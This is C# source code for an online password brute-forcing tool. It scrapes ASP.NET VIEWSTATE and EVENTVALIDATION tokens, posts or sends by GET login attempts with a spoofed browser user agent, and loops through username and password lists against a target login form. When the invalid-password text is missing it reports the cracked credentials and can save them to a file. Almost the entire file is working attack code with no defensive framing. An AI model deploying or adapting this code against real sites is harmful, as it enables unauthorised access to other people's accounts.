/**
* Send Request to the server and returns a response
* However event validation is active so i have to pull that from the initial response
*/
public static string sendLoginRequest(string username, string password)
{
//If the form type is ASP then use this to grab required values
if (UserInput.formType == 1)
{
//Gets the VIEWSTATE, EVENTVALIDATION ETC.
getData();
}
if (UserInput.formType != 3)
{
//Setup a new web request to the URL
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(UserInput.fullPath);
request.Method = "POST";
var postData = "";
//Set the post data to include VIEWSTATE Properties if acquired
if (__VIEWSTATE.Length > 0)
{
postData = "__VIEWSTATE=" + __VIEWSTATE + "&";
postData += "__VIEWSTATEGENERATOR=" + __VIEWSTATEGENERATOR + "&";
postData += "__EVENTVALIDATION=" + __EVENTVALIDATION + "&";
postData += HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&";
postData += HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password;
}
//If not just send the user name fields
else
{
postData = HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&";
postData += HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password;
//If we are using the general form
if (UserInput.formType == 2)
{
postData += "&" + UserInput.customFormVariables;
}
}
//Set general HTTP headers
request.ContentLength = postData.Length;
request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36";
request.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3";
request.ContentType = "application/x-www-form-urlencoded";
request.Host = UserInput.host;
request.Referer = UserInput.fullPath;
//Write the user information into the stream
StreamWriter requestWriter = new StreamWriter(request.GetRequestStream());
requestWriter.Write(postData);
requestWriter.Close();
//Get, read and return the response
var response = request.GetResponse();
responseStr = new StreamReader(response.GetResponseStream()).ReadToEnd();
}
else
{
UserInput.customFormVariables = UserInput.buildCustomOptions(UserInput.rawFormVariables);
//Setup a new web request to the URL
HttpWebRequest request = (HttpWebRequest)WebRequest.Create(UserInput.fullPath + "?" + HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&" + HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password + "&" + UserInput.customFormVariables);
//Set general HTTP headers
request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36";
request.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3";
if (UserInput.cookies.Length > 0)
{
if (UserInput.cookies.Length > 0)
{
request.Headers.Add(HttpRequestHeader.Cookie, UserInput.cookies);
}
}
request.ContentType = "application/x-www-form-urlencoded";
request.Host = UserInput.host;
request.Referer = UserInput.fullPath;
WebResponse response = request.GetResponse();
using (Stream data = response.GetResponseStream())
{
StreamReader reader = new StreamReader(data);
responseStr = reader.ReadToEnd();
}
response.Close();
}
return(responseStr);
}
/**
* Called to actually start attempting passwords
*/
public static void beginAttack()
{
//Load lists
loadLists();
//Check if it is meant to be using a usernames and passwords list
if (usernames.Count > 0)
{
//Foreach username
foreach (string username in usernames)
{
//Iterate through all the possible passwords
foreach (string password in passwords)
{
//If a match is found add it to the corresponding point in the array list that is in line with the user name
if (!Requests.sendLoginRequest(username, password).Contains(UserInput.invalidPasswordText))
{
foundPasswords.Add(password);
passwordFound = true;
break;
}
//If no password was found add no password found in the place instead to keep the list in line
else
{
foundPasswords.Add("No Password Found");
}
//As well, if showAttempts is set to true print out the fact that the attempt was invalid
if (showAttempts == true)
{
Console.Write(String.Format("Username: {0} Password: {1} Status: ", username, password));
Console.ForegroundColor = ConsoleColor.Red;
Console.Write("Incorrect\n");
Console.ResetColor();
}
}
}
}
//If the user selected to use a singular username
else
{
//Only loop through each password in the list
foreach (string password in passwords)
{
//If the correct password was found set teh correctUsername and correctPassword variables and break out of the loop
if (!Requests.sendLoginRequest(username, password).Contains(UserInput.invalidPasswordText))
{
passwordFound = true;
correctPassword = password;
correctUsername = username;
break;
}
//Similar to above if showAttempts is true show the failed password attempt
if (showAttempts == true)
{
Console.Write(String.Format("Username: {0} Password: {1} Status: ", username, password));
Console.ForegroundColor = ConsoleColor.Red;
Console.Write("Incorrect\n");
Console.ResetColor();
}
}
}
//After both loops are done and a password was found this block runs
if (passwordFound == true)
{
//First it checks if we are using a singular user name
if (username.Length > 0)
{
//If so change the text to green display "Password Found!!" and list the correct username and password
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("Password Found!!");
Console.WriteLine(String.Format("Username: {0} Password: {1}", correctUsername, correctPassword));
Console.ResetColor();
//And make the user type return if they are done if they dont then exit the program on the next key press
if (UserInput.getUserResponse("If you wish to return to the menu please type \"return\":") == "return")
{
Console.ReadKey();
UserInput.userSetup();
}
else
{
Console.WriteLine("Press Any Key To Exit...");
Console.ReadKey();
}
}
//However if the user was running a username list then display each user name and password combo, and ask if they want to write it to a file
else
{
Console.WriteLine("The Following List Of Passwords Was Found...\n");
for (int i = 0; i < foundPasswords.Count; i++)
{
if (foundPasswords[i] != "No Password Found")
{
Console.WriteLine(String.Format("Username: {0} Password: {1}", usernames[i], foundPasswords[i]));
}
}
//Asks the user if they want to output the password/username list to a file
if (UserInput.getUserResponse("Would you like to output this list to a file? (y/n):") == "y")
{
//Ask where then generate a variable to then write to the file
string outPath = UserInput.getUserResponse("Enter An Output Path: ");
string output = "";
for (int i = 0; i < foundPasswords.Count; i++)
{
if (foundPasswords[i] != "No Password Found")
{
output += String.Format("Username: {0} Password: {1}", usernames[i], foundPasswords[i]) + "\n";
}
}
File.WriteAllText(outPath, output);
}
}
}
//If no passwords were found at all
else
{
//Turn the text red and then wait for the user to press a key then exit
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("No Matches Found");
Console.ResetColor();
Console.WriteLine("Press Any Key To Exit...");
Console.ReadKey();
}
}
